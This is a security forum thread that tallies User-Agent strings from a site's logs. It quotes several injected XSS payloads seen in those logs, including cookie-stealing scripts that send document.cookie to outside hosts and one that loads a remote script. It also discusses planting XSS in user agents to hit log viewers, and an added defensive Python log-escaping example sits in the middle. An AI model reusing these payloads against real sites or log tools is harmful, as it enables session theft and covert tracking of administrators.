User agents (Long probably pointless)
Posted by: id
Date: February 16, 2008 02:57PM

I was looking at the logs on ha.ckers for the first time in months, and over the past couple of months there were a total of 4773 unique User Agents.

These are the totals for User Agents with "Microsoft" or "IE" in the UA name.

1 <!--[if gte IE 4]><SCRIPT>alert
1 IE50
1 IEAutoDiscovery
1 MaxIE
1 Microsoft Data Access Internet Publishing Provider DAV 1.1; afcid=W68da1e0be0f6543da3f70fdfc00fb277
1 Microsoft Data Access Internet Publishing Provider DAV 1.2
1 Microsoft URL Control - 5.01.4319
1 MyIE
2 Microsoft Windows XP NT 5.0
3 MSIE 5.0
3 Mozilla/5.0 compatible; MSIE5.5; Windows 98;
4 MSIE 7.0
4 Microsoft Data Access Internet Publishing Provider Cache Manager
5 Microsoft Office Existence Discovery
7 Microsoft Office Protocol Discovery
8 AOL 7.0/MSIE 5.5
8 MSIE7.01 UNIX
8 SAMSUNG-SGH-i710/MSIE4.01/WAP2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
9 MSIE 7.0; Windows NT 6.0;
10 MSIE 7.0/Nutch-1.0-dev
10 Microsoft-WebDAV-MiniRedir/6.0.6000
11 IE
11 Microsoft Visio MSIE
13 IE/4.0
13 MSIE5.5
13 Windoof NT3.51;IE4
16 Microsoft
21 IE 7.0
26 MSIE
30 Internet Explorer 7.0, Microsoft Co.
44 Microsoft Data Access Internet Publishing Provider DAV 1.1
70 Microsoft Data Access Internet Publishing Provider Protocol Discovery
153 Microsoft URL Control - 6.01.9782
171 Microsoft-WebDAV-MiniRedir/5.1.2600
329 Microsoft URL Control - 6.00.8862
412 Microsoft Internet Explorer/4.0b1
574 Microsoft Pocket Internet Explorer/0.6
1406 Microsoft URL Control - 6.00.8169
1809 Microsoft Internet Explorer
2130 IE/6.0

Not very many for almost 3 months, wget has almost as many entries...

4458 Wget/1.10.2

By and Opera:
1 Opera 7.0 SonyEricssonP990i/R100 Mozilla/4.0
1 Opera/7.01
1 Opera/7.22
1 Opera/7.54u1
1 Opera/8.02
1 Opera/99.01
2 Opera 9.7.2.0
2 Opera/9.1
2 Opera/9.24
3 Opera/7.23
3 Opera/7.26
3 Opera/9
3 Opera/9.2
4 Opera/8.10
5 Opera/7.51
7 Mozilla/5.0 Opera/9.01
7 Opera/<marquee><nobr><b>\xd1\xea\xf0\xe8\xef\xf2-\xed\xe0\xf1\xf2\xee\xeb\xfc\xea\xee_\xf1\xf3\xf0\xee\xe2\xfb\xe9_\xf7\xf2\xee_\xef\xee\xeb\xe7\xe0\xe5\xf2_\xef\xee_\xf1\xe0\xe9\xf2\xe0\xec_\xf1_\xef\xee\xec\xee\xf9\xfc\xfe_\xea\xee\xec\xe0\xed\xe4\xed\xee\xe9_\xf1\xf2\xf0\xee\xea\xe8=)<title>
8 Opera/6.05
8 Opera/6.09
8 Opera/9.0
10 Opera/8.52
12 Opera/8.53
18 Opera 8.54
27 Opera/6.03
28 Opera/7.02 Bork-edition
28 Opera/9.26
39 Opera/6.02
44 Opera/8.54
49 Opera/5.02
54 Opera/7.50
61 Opera/9.12
63 Opera/6.01
70 Opera/7.0
77 Opera/8.51
99 Opera/6.04
115 Opera/8.0
126 Opera/8.50
129 Opera/7.60
136 Opera/7.54
143 Opera/7.11
156 Opera/9.30
172 Opera/8.00
263 Opera/8.5
1354 Opera/9.01
1387 Opera/9.02
2042 Opera/9.00
3339 Opera/9.10
3708 Opera/4.0
4687 Opera/8.01
5429 Opera/9.20
5832 Opera/9.22
6524 Opera/9.21
21065 Opera/9.50
25328 Opera/9.23
35050 Opera/9.24
39649 Opera/9.25
52247 Opera/9.0

Mozilla:
1 =Mozilla/5.0
1 Build identifier: Mozilla/5.0
1 MoGET /favicon.ico HTTP/1.1, Mozilla/5.0
1 Mozilla 4.0
1 Mozilla 5.0
1 Mozilla 5.0 Firefox
1 Mozilla/0.97 no dos :)
1 Mozilla/2.0
1 Mozilla/4.0
1 Mozilla/4.7 [en]C-NSCPCD
1 Mozilla/4.72
1 Mozilla/4.72 [en]
1 Mozilla/4.78 [ja]
1 Mozilla/5.0 Galeon/1.2.6
1 Mozilla/5.0 Gecko/20020823 MultiZilla?/v1.1.22
1 Mozilla/5.0 Opera/12.01
1 Mozilla/5.0 UP.Link/6.3.1.17.06.3.1.17.06.3.1.17.0
1 Mozilla/5.0 libwww-perl/5.805
1 Mozilla/5.01
1 Mozilla/9.2
1 Opera 7.0 SonyEricssonP990i/R100 Mozilla/4.0
1 T-Mobile Dash Mozilla/4.0
1 User-Agent: Mozilla/5.0 Gecko/20080108 Firefox/2.0.0.11
1 \xe2\x80\x9cMozilla/4.0
2 MOT-A1200/R532H2_G_11.20.08P Mozilla/4.0
2 MOT-Q9/01.07.05R Mozilla/4.0
2 Mozilla /4.0
2 Mozilla/2.02E
2 Mozilla/3.01Gold
2 Mozilla/4.0/Nutch-1.0-dev
2 Mozilla/4.0\\r\\n
2 Mozilla/4.21
2 Mozilla/4.61 [ja]
2 Mozilla/4.78 [en]
2 Mozilla/4.78 [sv]
2 Mozilla/4.78iC-CCK-MCD [en_US]
2 Mozilla/4.79 [en]C-CCK-MCD Alehop
2 Mozilla/4.79 [en]C-CCK-MCD DOJ3jx7bf
2 Mozilla/4.79 [en]C-gatewaynet
2 Mozilla/5.0 Gecko/20070713 Firefox/2.0.0.0
2 Mozilla/5.0 NewsFox/0.8.4b1
2 Mozilla/5.0 Safari
2 Mozilla/5.0 UP.Link/6.3.1.20.06.3.1.20.06.3.1.20.0
2 mozilla 4.0
3 GRD-267DTU Mozilla/4.0
3 HTC_P4350 Mozilla/4.0
3 Mozilla/4.
3 Mozilla/4.00
3 Mozilla/5.0 NewsFox/0.8.1
3 Mozilla/5.0 compatible; MSIE5.5; Windows 98;
3 \"Mozilla/4.0
3 del.icio.us-thumbnails/1.0 Mozilla/5.0
4 HTC-3100/1.2 Mozilla/4.0
4 MOT-RAZRV3xx/96.B0.0AR BER2.2 Mozilla/4.0
4 Mozilla/4.0 www.USALocalSearch.us Robot
4 Mozilla/4.08
4 Mozilla/4.7 [de]
4 Mozilla/5.0 UP.Link/6.3.1.17.06.3.1.17.0
5 'Mozilla/4.0
5 Mozilla/5.0 someone@somewhere.any
5 Mozilla/Firefox
5 Palm680/RC1 Mozilla/4.0
5 Python-urllib/1.17, Mozilla/5.0
5 SonyEricssonP1i/R100 Mozilla/4.0
6 HTCS621-Mozilla/4.0+
6 Mozilla/3.0 WebTV/1.2
6 Mozilla/4.5
6 Mozilla/4.5 [en]C-CCK-MCD {TLC;RETAIL}
6 Mozilla/5.0 Galeon/1.2.5
6 Mozilla/5.0 UP.Link/6.3.1.17.0
6 \"Mozilla/5.0
6 \"Mozilla\"
7 Mozilla 4.3
7 Mozilla 5.0
7 Mozilla Firefox 2.0.0.4
7 Mozilla/4.22
7 Mozilla/5.0 Gecko/20079999 Firefox/2.x.x.x
7 Mozilla/5.0 Opera/9.01
7 Mozilla/5.0+
7 Mozilla/5.001
7 Mozilla/6.0
7 PPC; 240x320; HTC_TyTN/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Mozilla/4.0
7 SonyEricssonW950i/R100 Mozilla/4.0
8 HTC-8900/1.2 Mozilla/4.0
8 Mozilla/4.51 [tr]C-CCK-MCD SOL_NS451tr - F&C
8 Mozilla/4.77 [en]
8 Mozilla/4.O
8 Mozilla/5.0 Firefox
8 Mozilla/5.0 NewsFox/0.8.4b2
8 Mozilla/5.0 UP.Link/6.3.1.20.0
8 Mozilla/7.0
8 SAMSUNG-SGH-I617/1.0 Mozilla/4.0
8 Windows Vista: Mozilla/4.0
9 HTC-8100/1.2 Mozilla/4.0
9 HTC_TouchDual Mozilla/4.0
9 Mozilla Firefox
9 Mozilla/4.79C-CCK-MCD [en]
9 publicMozilla/FrontUSB/9.0
10 Mozilla/5.0 NewsFox/0.8.3.1
11 Mozilla Firefox
12 Mozilla/4.0 WebTV/2.6
12 Mozilla/4.06 [en]
12 Mozilla/4.1
12 PANTECH-C810/R01 Mozilla/4.0
12 illuz1oN's -> Mozilla/5.0
14 MOT-ROKR E2/R564_G_12.00.43P Mozilla/4.0
14 Mozilla/4.8
14 Mozilla/5.0 Gecko/20021029 Phoenix/0.4
14 Mozilla/5.0 NewsFox/0.8.4rc1
16 1.0.6 on Debian Linux - Mozilla/5.0
16 MOT-MOTOROKRE6/R533_G_11.12.08P Mozilla/4.0
16 Mozilla/5.0 Gecko/20050511 Firefox/1.0.4
17 Googlebot googlebot bot spider Mozilla/4.8 [en]
17 PPC; 240x320; HTC_P3450/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Mozilla/4.0
18 Mozilla/4.79
19 Mozilla/4.05 [en]
20 HPiPAQhw6900/1.0/Mozilla/4.0
20 Mozilla/5.0 Galeon/1.2.0
22 Mozilla/2.02 [fr]
23 Mozilla/3.01-C-SYMPA
24 Mozilla/4.0 WebTV/2.8
27 Mozilla/1.10 [en]
27 Mozilla/4.7C-SGI [en]
27 User-Agent=Mozilla/5.0
28 Mozilla/4.2
28 Mozilla/5.0 NewsFox/0.8.4
28 Y!OASIS/TEST no-ad Mozilla/4.08 [en]
29 Mozilla/4.5 RPT-HTTPClient/0.3-2
30 Mozilla/4.06 [es]
37 Mozilla/4.5 [en]C-CCK-MCD {TLC;RETAIL}
37 User-Agent: Mozilla/5.0
40 Mozilla/6.0;
41 Mozilla/4.0 Sprint:MotoQ
44 Mozilla/5.0 UP.Link/6.3.0.0.0
46 HTC-8500/1.2 Mozilla/4.0
49 Mozilla/8.0
50 Mozilla
54 Mozilla/4.75 [en]
58 Mozilla/4.0 compatible FurlBot/Furl Search 2.0
58 Mozilla/4.01
58 Mozilla/6.66 [en]
61 Mozilla/4.0+
65 Mozilla/4.7 [en]
75 Mozilla/4.0 compatible ZyBorg/1.0
77 Mozilla/4.08 [en]
82 MOT-Q9/01.04.35R Mozilla/4.0
82 Mozilla/5.0 Gecko/20070713 Firefox/2.0.0.0
84 Mozilla/7.0
85 Mozilla/4.5 [en]
86 SAMSUNG-SGH-I607/I607FG1 Mozilla/4.0
86 SonyEricssonP990i/R100 Mozilla/4.0
95 Mozilla
97 MSNBOT_Mobile MSMOBOT Mozilla/2.0
139 Mozilla/0.6 Beta
143 Mozilla/0.91 Beta
144 Mozilla/4.78
156 Mozilla/4.79 [en]
166 Mozilla/4.7
184 Mozilla/2.0 compatible; Check&Get 1.14
192 Mozilla/4.76 [en]
245 MaSagool/Mozilla/5.0
313 \"Mozilla/5.0
330 mozilla/5.0
369 Mozilla/6.0
370 Mozilla/4.61
419 Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
466 MOT-MPx220/1.400 Mozilla/4.0
603 Mozilla/4.61 [en]
603 Mozilla/5.0 NewsFox/0.8.2
675 Mozilla/4.8 [en]
874 Mozilla/5.0 NewsFox/0.8.3
1065 Mozilla/3.01
1296 Mozilla/1.22
3068 Mozilla/4.0
3297 Mozilla/5.0
3779 Mozilla/2.0
3818 Mozilla/3.0
3889 Mozilla/4.5
5809 Mozilla/3.0
13748 User-Agent: Mozilla/4.0
1483529 Mozilla/4.0
2498049 Mozilla/5.0

Here are the complete top ten UA:

40716 libwww-perl/5.805
43629 Liferea/1.4.4
46785 Apple-PubSub/59
52247 Opera/9.0
56183 libwww-perl/5.808
69908 Akregator/1.2.7; librss/remnants
104208 Windows-RSS-Platform/1.0
121315 -
1483529 Mozilla/4.0
2498049 Mozilla/5.0

So, even if we give all the "-" entry ones to IE, it still seems like a very very small percentage of our traffic. Do that few people really use IE?

-id



Edited 1 time(s). Last edit at 02/16/2008 02:59PM by id.

Re: User agents (Long probably pointless)
Posted by: Malkav
Date: February 18, 2008 02:48AM

I'd rather say that either the average IE user doesn't come here or, more plausibly, anyone sufficiently security-aware has thrown IE in the bin. I'd say the IE traffic here is pretty much an artefact.

But what? No dillo? No lynx/links/elinks? No netcat? No faked user agents? (I tend to love inserting bash quotes as a user agent in www logs. I don't think I'm the only one doing whacky stuff around here.)

Re: User agents (Long probably pointless)
Posted by: id
Date: February 18, 2008 04:00PM

Like I said, there were 4773 unique User Agents, a few quotes:

"my System is like a wigwam, no gates and no windows inside."

176 Lynx/2.8.3rel.1 libwww-FM/2.14FM
1 lynx fuckyou linuz

Some odd ones, lots of XSS, etc attempts.
iTunes/4.7.1
mice
1984
<blink>?</blink>
<script>document.location=\"http://sitea.com/log.php?c=\"+document.cookie+\"&redirect=http://siteb.com\";</script>
<script>while
Keep Out
<script>window.open
SET USER AGENT
fuck you
none
Mr. Big Liar
Particls
<b>'Treated As: \"Top Secret\"!'
<script src=http://usethebackdoor.free.fr/hack.js></script>
God
xx<script>alert
h4x0r
Hacked
ILOVEBFS
UberHax0r.9000
<!--<b>vvv//-->cccc
<b><h2>31337 Antichat Member.Fuck u, Spielberg</h2></b>
<html><body><script>alert
<script type=\"javascript\">window.location=\"http://s3klyma.110mb.com/stealer.php?cookie=\" + document.cookie</script>
Behold the Ueberbrowser!
Dont Know Limited Browser
ha.ckers.org
something
Fuck you doch. Meinen Browser erf\xc3\xa4hrst du nicht!
I'm not telling =P
all email  for alaska
BatMobile
Defaced
What the F*** Do You Care?  It is My business!
Find another way
why do you care you freek? ;)

I'm sure there are more, but not going to look through that many!

-id

Re: User agents (Long probably pointless)
Posted by: Malkav
Date: February 18, 2008 04:49PM

"my System is like a wigwam, no gates and no windows inside."

excellent :)

Re: User agents (Long probably pointless)
Posted by: Matt Presson
Date: February 20, 2008 08:37AM

Very classy, and funny to boot!

Re: User agents (Long probably pointless)
Date: February 26, 2008 11:08AM

Who else here surfs with an empty user-agent string?

Re: User agents (Long probably pointless)
Posted by: Syme
Date: January 18, 2009 02:37PM

I wonder what the chance of people's user agents being viewed in a manner that's vulnerable to XSS is. If the chance is decent then I just had an interesting (and probably legal to implement!) idea.

Also, please don't strangle me for posting on an old thread.



Edited 1 time(s). Last edit at 01/18/2009 02:38PM by Syme.

Re: User agents (Long probably pointless)
Posted by: id
Date: January 19, 2009 12:01PM

webalizer and others have been exploited via XSS in the logs, and I guess any web based analytics page has a chance of being exploitable.

-id

Re: User agents (Long probably pointless)
Posted by: rsnake
Date: January 19, 2009 03:24PM

Yup, log files are often posted in random ways. That's why user agent and referrer spam is so frequent. Often enough those logs get posted and they end up helping out the attackers. It's not a new attack by _any_ means.

- RSnake
Gotta love it. http://ha.ckers.org
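
The log-viewer risk discussed in the last few posts, shown from the reporting side as an added example that is not part of the original thread: a tally of User-Agent values that flags entries containing markup and HTML-escapes every value before it reaches a report page. It assumes Apache "combined" log format; the function names and the sample lines are constructed for illustration.

```python
import html
import re
from collections import Counter

# Constructed sample lines in Apache "combined" format (not taken from the ha.ckers logs).
SAMPLE_LOG = r'''
192.0.2.10 - - [16/Feb/2008:14:57:01 -0800] "GET / HTTP/1.1" 200 5120 "-" "Opera/9.25"
192.0.2.11 - - [16/Feb/2008:14:57:02 -0800] "GET / HTTP/1.1" 200 5120 "-" "Opera/9.25"
192.0.2.12 - - [16/Feb/2008:14:57:03 -0800] "GET /rss HTTP/1.1" 200 900 "-" "-"
192.0.2.13 - - [16/Feb/2008:14:57:04 -0800] "GET / HTTP/1.1" 200 5120 "-" "<script>alert(1)</script>"
192.0.2.14 - - [16/Feb/2008:14:57:05 -0800] "GET / HTTP/1.1" 200 5120 "-" "my \"quoted\" agent <blink>?</blink>"
'''

# Tail of a combined-format line: "request" status size "referer" "user-agent".
# Quoted fields may contain backslash-escaped quotes, so [^"]* alone is not enough.
LINE_RE = re.compile(
    r'"(?:[^"\\]|\\.)*" \d{3} \S+ "(?:[^"\\]|\\.)*" "((?:[^"\\]|\\.)*)"\s*$'
)
# Crude heuristic used only to flag rows for review; escaping below is the real control.
MARKUP_RE = re.compile(r'[<>]|&#|javascript:', re.I)

def count_user_agents(log_text):
    """Return a Counter of raw User-Agent strings, like `sort | uniq -c`."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            counts[m.group(1)] += 1
    return counts

def suspicious(counts):
    """User agents that carry markup and would execute in a naive HTML report."""
    return sorted(ua for ua in counts if MARKUP_RE.search(ua))

def render_report(counts):
    """Build an HTML table; every client-supplied value is escaped on output."""
    rows = []
    for ua, n in sorted(counts.items(), key=lambda kv: (kv[1], kv[0])):
        flag = ' class="flag"' if MARKUP_RE.search(ua) else ''
        rows.append(f'<tr{flag}><td>{n}</td><td>{html.escape(ua, quote=True)}</td></tr>')
    return '<table>\n' + '\n'.join(rows) + '\n</table>'
```

The same escaping applies to the referrer and request fields, which are equally client-controlled.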

Re: User agents (Long probably pointless)
Posted by: Syme
Date: January 19, 2009 07:08PM

I gather that it's not a new attack (although I still quite like the idea). I wouldn't want to use the classic cookie stealing xss, because as I have little direct control of who views your user agent, it would probably get me into more trouble than it's worth, and out of my depth. I've just written a variant on it which simply reciprocates what they tried to do to you by logging their referrer, user id and ip. Useful because it's completely legal (I think) and (hopefully sometimes) warns you when people view info on you.

Re: User agents (Long probably pointless)
Posted by: wireghoul
Date: January 19, 2009 10:45PM

The legality is subject to any number of things, if you are in the US then apparently breach of ToS might be a hack these days. And if you're in a different country the wording of your local computer crimes act is likely to be somewhat vaguely defined as to allow for oddball cases to be tried without having to invent new laws.
And even if it is legal to submit XSS in user agents, the actions recorded could be conceived as illegal surveillance or heavens forbid it breaks something you might still be the subject of a civil lawsuit which can be very costly even if you win it just based on court/lawyer costs alone. That's how a certain religious group took down the cult awareness network, frivolous civil lawsuits leading to bankruptcy.

The likelihood of you getting sued/arrested for such an attack I'd say is very low, but it's still possible. It really depends on what your attack does and who the recipients are.

[www.justanotherhacker.com]
